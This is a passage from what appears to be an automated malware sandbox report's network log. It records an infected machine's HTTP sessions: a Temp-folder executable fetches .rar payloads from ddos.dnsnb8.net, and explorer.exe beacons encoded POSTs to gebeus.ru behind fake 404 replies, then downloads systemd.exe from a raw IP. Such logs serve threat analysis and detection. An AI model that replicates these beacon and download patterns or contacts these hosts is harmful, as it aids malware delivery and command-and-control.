                                                                                    3192.168.2.104971344.221.84.1057997708C:\Users\user\AppData\Local\Temp\IXDaI.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jul 24, 2024 19:55:40.989783049 CEST288OUTGET /cj//k3.rar HTTP/1.1
                                                                                    Accept: */*
                                                                                    Accept-Encoding: gzip, deflate
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                    Host: ddos.dnsnb8.net:799
                                                                                    Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4192.168.2.104971544.221.84.1057997708C:\Users\user\AppData\Local\Temp\IXDaI.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jul 24, 2024 19:55:42.662909031 CEST288OUTGET /cj//k4.rar HTTP/1.1
                                                                                    Accept: */*
                                                                                    Accept-Encoding: gzip, deflate
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                    Host: ddos.dnsnb8.net:799
                                                                                    Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5192.168.2.104971644.221.84.1057997708C:\Users\user\AppData\Local\Temp\IXDaI.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jul 24, 2024 19:55:43.114099026 CEST288OUTGET /cj//k5.rar HTTP/1.1
                                                                                    Accept: */*
                                                                                    Accept-Encoding: gzip, deflate
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                    Host: ddos.dnsnb8.net:799
                                                                                    Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6192.168.2.1049717189.165.133.52803968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jul 24, 2024 19:55:45.891680002 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Accept: */*
                                                                                    Referer: http://mbcyqmttpiinpghx.com/
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                    Content-Length: 214
                                                                                    Host: gebeus.ru
                                                                                    Jul 24, 2024 19:55:45.891705990 CEST214OUTData Raw: 3b 6e 59 17 f2 c9 1e 24 ab a8 b0 07 74 07 7d c9 7a 0d b9 e7 19 08 e1 60 7b 0f 73 96 32 c5 c6 62 9e 2c c3 20 05 68 20 6e 9f 9b 3f c1 3d 38 da 8e 7f b9 1a 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 38 0d ce b9
                                                                                    Data Ascii: ;nY$t}z`{s2b, h n?=8t M@NA .[k,vu8IEBEfhWYx5`{$,-t\U>U9"HHIDQfnRJ:X7}DU9-R-`
                                                                                    Jul 24, 2024 19:55:46.938671112 CEST152INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.0
                                                                                    Date: Wed, 24 Jul 2024 17:55:46 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    Data Raw: 04 00 00 00 72 e8 85 eb
                                                                                    Data Ascii: r


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7192.168.2.1049718189.165.133.52803968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jul 24, 2024 19:55:46.948877096 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Accept: */*
                                                                                    Referer: http://eyqxnblygic.org/
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                    Content-Length: 331
                                                                                    Host: gebeus.ru
                                                                                    Jul 24, 2024 19:55:46.948895931 CEST331OUTData Raw: 3b 6e 59 17 f2 c9 1e 24 ab a8 b0 07 74 07 7d c9 7a 0d b9 e7 19 08 e1 60 7b 0f 73 96 32 c5 c6 62 9e 2c c3 20 05 68 20 6e 9f 9b 3f c1 3d 38 da 8e 7f b9 1a 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0a 6b 2c 90 f5 76 0b 75 75 34 c9 8c
                                                                                    Data Ascii: ;nY$t}z`{s2b, h n?=8t M@NA -[k,vuu4RVSUtWmNu-L?~[.lVkCOQLF=r:G'6^E^Z,G,(&-0Yw'F_]v:uJ.g'-`
                                                                                    Jul 24, 2024 19:55:48.008116007 CEST484INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.0
                                                                                    Date: Wed, 24 Jul 2024 17:55:47 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    8192.168.2.1049719189.165.133.52803968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jul 24, 2024 19:55:48.017388105 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Accept: */*
                                                                                    Referer: http://elpsnjvbyqt.com/
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                    Content-Length: 160
                                                                                    Host: gebeus.ru
                                                                                    Jul 24, 2024 19:55:48.017420053 CEST160OUTData Raw: 3b 6e 59 17 f2 c9 1e 24 ab a8 b0 07 74 07 7d c9 7a 0d b9 e7 19 08 e1 60 7b 0f 73 96 32 c5 c6 62 9e 2c c3 20 05 68 20 6e 9f 9b 3f c1 3d 38 da 8e 7f b9 1a 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0b 6b 2c 90 f5 76 0b 75 22 48 d3 a7
                                                                                    Data Ascii: ;nY$t}z`{s2b, h n?=8t M@NA -[k,vu"HrSBQ|BFUuh(cioZK\%6=U RE
                                                                                    Jul 24, 2024 19:55:49.286451101 CEST484INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.0
                                                                                    Date: Wed, 24 Jul 2024 17:55:49 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    9192.168.2.1049720189.165.133.52803968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jul 24, 2024 19:55:49.295620918 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Accept: */*
                                                                                    Referer: http://xnmfeyqpwnehurxh.net/
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                    Content-Length: 271
                                                                                    Host: gebeus.ru
                                                                                    Jul 24, 2024 19:55:49.295650005 CEST271OUTData Raw: 3b 6e 59 17 f2 c9 1e 24 ab a8 b0 07 74 07 7d c9 7a 0d b9 e7 19 08 e1 60 7b 0f 73 96 32 c5 c6 62 9e 2c c3 20 05 68 20 6e 9f 9b 3f c1 3d 38 da 8e 7f b9 1a 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 08 6b 2c 90 f5 76 0b 75 2a 33 b1 ec
                                                                                    Data Ascii: ;nY$t}z`{s2b, h n?=8t M@NA -[k,vu*3b3wjC~C%>ri\k%GMe+X!f^/I!9cj@K+WG&x|@]#rzsS9
                                                                                    Jul 24, 2024 19:55:50.375511885 CEST484INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.0
                                                                                    Date: Wed, 24 Jul 2024 17:55:50 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    10192.168.2.1049721189.165.133.52803968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jul 24, 2024 19:55:50.384366989 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Accept: */*
                                                                                    Referer: http://eeycidiyfjvuwaep.net/
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                    Content-Length: 311
                                                                                    Host: gebeus.ru
                                                                                    Jul 24, 2024 19:55:50.384402990 CEST311OUTData Raw: 3b 6e 59 17 f2 c9 1e 24 ab a8 b0 07 74 07 7d c9 7a 0d b9 e7 19 08 e1 60 7b 0f 73 96 32 c5 c6 62 9e 2c c3 20 05 68 20 6e 9f 9b 3f c1 3d 38 da 8e 7f b9 1a 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 7d 2a ee f5
                                                                                    Data Ascii: ;nY$t}z`{s2b, h n?=8t M@NA -[k,vu}*Utcvy@{P)--O81fz#u '?n&=n/a]h]9kl8.25(b@l#Pk} Fw
                                                                                    Jul 24, 2024 19:55:51.430130959 CEST484INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.0
                                                                                    Date: Wed, 24 Jul 2024 17:55:51 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    11192.168.2.1049722189.165.133.52803968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jul 24, 2024 19:55:51.447033882 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Accept: */*
                                                                                    Referer: http://qmbakktwarjac.net/
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                    Content-Length: 262
                                                                                    Host: gebeus.ru
                                                                                    Jul 24, 2024 19:55:51.447058916 CEST262OUTData Raw: 3b 6e 59 17 f2 c9 1e 24 ab a8 b0 07 74 07 7d c9 7a 0d b9 e7 19 08 e1 60 7b 0f 73 96 32 c5 c6 62 9e 2c c3 20 05 68 20 6e 9f 9b 3f c1 3d 38 da 8e 7f b9 1a 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 78 32 ea a0
                                                                                    Data Ascii: ;nY$t}z`{s2b, h n?=8t M@NA -[k,vux2UGd;HQN; k#yp)0="7_?Tkr>E$(/d0['v4*+Jv' (_x.NnO)gCjr,u
                                                                                    Jul 24, 2024 19:55:52.507863998 CEST484INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.0
                                                                                    Date: Wed, 24 Jul 2024 17:55:52 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    12192.168.2.1049723189.165.133.52803968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jul 24, 2024 19:55:52.519596100 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Accept: */*
                                                                                    Referer: http://feltxgyoedldtlt.net/
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                    Content-Length: 117
                                                                                    Host: gebeus.ru
                                                                                    Jul 24, 2024 19:55:52.519608974 CEST117OUTData Raw: 3b 6e 59 17 f2 c9 1e 24 ab a8 b0 07 74 07 7d c9 7a 0d b9 e7 19 08 e1 60 7b 0f 73 96 32 c5 c6 62 9e 2c c3 20 05 68 20 6e 9f 9b 3f c1 3d 38 da 8e 7f b9 1a 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 56 2d b3 8b
                                                                                    Data Ascii: ;nY$t}z`{s2b, h n?=8t M@NA -[k,vuV-Z$mf|mtqQyooq
                                                                                    Jul 24, 2024 19:55:53.617111921 CEST484INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.0
                                                                                    Date: Wed, 24 Jul 2024 17:55:53 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    13192.168.2.1049724189.165.133.52803968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jul 24, 2024 19:55:53.628927946 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Accept: */*
                                                                                    Referer: http://wtlgosscvcry.org/
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                    Content-Length: 279
                                                                                    Host: gebeus.ru
                                                                                    Jul 24, 2024 19:55:53.628963947 CEST279OUTData Raw: 3b 6e 59 17 f2 c9 1e 24 ab a8 b0 07 74 07 7d c9 7a 0d b9 e7 19 08 e1 60 7b 0f 73 96 32 c5 c6 62 9e 2c c3 20 05 68 20 6e 9f 9b 3f c1 3d 38 da 8e 7f b9 1a 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0c 6b 2c 90 f5 76 0b 75 7d 3d ba fc
                                                                                    Data Ascii: ;nY$t}z`{s2b, h n?=8t M@NA -[k,vu}=e\`=L3;%=l&h<3=#D%23q$%)9@2@'U+<H>+nQc~G}>s7L0g
                                                                                    Jul 24, 2024 19:55:54.697163105 CEST189INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.0
                                                                                    Date: Wed, 24 Jul 2024 17:55:54 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2e 5c 24 14 a6 69 44 aa ad 10 bd cf b4 f9 6d 87 37 c6 ec 26 57 11 c2 8f 97 cb
                                                                                    Data Ascii: #\.\$iDm7&W


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    14192.168.2.104972577.221.157.163803968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jul 24, 2024 19:55:54.707387924 CEST163OUTGET /systemd.exe HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                    Host: 77.221.157.163


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    15192.168.2.1049727189.165.133.52803968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jul 24, 2024 19:56:16.126836061 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Accept: */*
                                                                                    Referer: http://pkqgdawiidcayk.com/
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                    Content-Length: 114
                                                                                    Host: gebeus.ru
                                                                                    Jul 24, 2024 19:56:16.126872063 CEST114OUTData Raw: 3b 6e 59 17 f2 c9 1e 24 ab a8 b0 07 74 07 7d c9 7a 0d b9 e7 19 08 e1 60 7b 0f 73 96 32 c5 c6 62 9e 2c c3 20 05 68 20 6e 9f 9b 3f c1 3d 38 da 8e 7f b9 1a 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0d 6b 2c 90 f5 76 0b 75 20 32 d7 8b
                                                                                    Data Ascii: ;nY$t}z`{s2b, h n?=8t M@NA -[k,vu 2&VJy/]Ot?+
                                                                                    Jul 24, 2024 19:56:17.278422117 CEST484INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.0
                                                                                    Date: Wed, 24 Jul 2024 17:56:17 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
